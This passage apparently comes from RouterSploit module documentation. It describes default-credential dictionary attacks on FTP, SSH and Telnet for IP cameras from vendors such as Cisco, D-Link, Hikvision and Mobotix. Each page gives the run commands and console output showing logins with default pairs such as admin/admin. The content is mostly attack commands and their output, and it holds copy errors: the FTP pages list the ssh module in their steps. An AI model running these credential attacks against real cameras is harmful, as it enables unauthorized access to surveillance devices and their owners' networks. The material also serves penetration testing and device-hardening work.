Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Cisco Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/cisco/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/cisco/ftp_default_creds
rsf (Cisco Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Cisco Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Cisco Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/cisco/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/cisco/ssh_default_creds
rsf (Cisco Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Cisco Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Cisco Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/cisco/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/cisco/telnet_default_creds
rsf (Cisco Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Cisco Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against D-Link Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/dlink/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/dlink/ftp_default_creds
rsf (D-Link Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (D-Link Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against D-Link Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/dlink/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/dlink/ssh_default_creds
rsf (D-Link Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (D-Link Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against D-Link Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/dlink/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/dlink/telnet_default_creds
rsf (D-Link Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (D-Link Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against GeoVision Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/geovision/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/geovision/ftp_default_creds
rsf (GeoVision Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (GeoVision Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against GeoVision Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/geovision/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/geovision/ssh_default_creds
rsf (GeoVision Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (GeoVision Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against GeoVision Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/geovision/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/geovision/telnet_default_creds
rsf (GeoVision Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (GeoVision Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Grandstream Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/grandstream/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/grandstream/ftp_default_creds
rsf (Grandstream Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Grandstream Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Grandstream Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/grandstream/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/grandstream/ssh_default_creds
rsf (Grandstream Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Grandstream Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Grandstream Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/grandstream/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/grandstream/telnet_default_creds
rsf (Grandstream Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Grandstream Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Hikvision Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/hikvision/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/hikvision/ftp_default_creds
rsf (Hikvision Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Hikvision Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Hikvision Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/hikvision/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/hikvision/ssh_default_creds
rsf (Hikvision Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Hikvision Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Hikvision Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/hikvision/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/hikvision/telnet_default_creds
rsf (Hikvision Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Hikvision Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Honeywell Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/honeywell/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/honeywell/ftp_default_creds
rsf (Honeywell Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Honeywell Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Honeywell Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/honeywell/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/honeywell/ssh_default_creds
rsf (Honeywell Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Honeywell Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Honeywell Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/honeywell/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/honeywell/telnet_default_creds
rsf (Honeywell Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Honeywell Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against IQInvision Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/iqinvision/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/iqinvision/ftp_default_creds
rsf (IQInvision Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (IQInvision Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against IQInvision Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/iqinvision/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/iqinvision/ssh_default_creds
rsf (IQInvision Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (IQInvision Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against IQInvision Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/iqinvision/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/iqinvision/telnet_default_creds
rsf (IQInvision Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (IQInvision Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against JVC Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/jvc/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/jvc/ftp_default_creds
rsf (JVC Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (JVC Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against JVC Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/jvc/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/jvc/ssh_default_creds
rsf (JVC Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (JVC Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against JVC Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/jvc/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/jvc/telnet_default_creds
rsf (JVC Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (JVC Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Mobotix Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/mobotix/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/mobotix/ftp_default_creds
rsf (Mobotix Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Mobotix Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Mobotix Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/mobotix/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/mobotix/ssh_default_creds
rsf (Mobotix Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Mobotix Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Mobotix Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/mobotix/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/mobotix/telnet_default_creds
rsf (Mobotix Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Mobotix Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Samsung Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
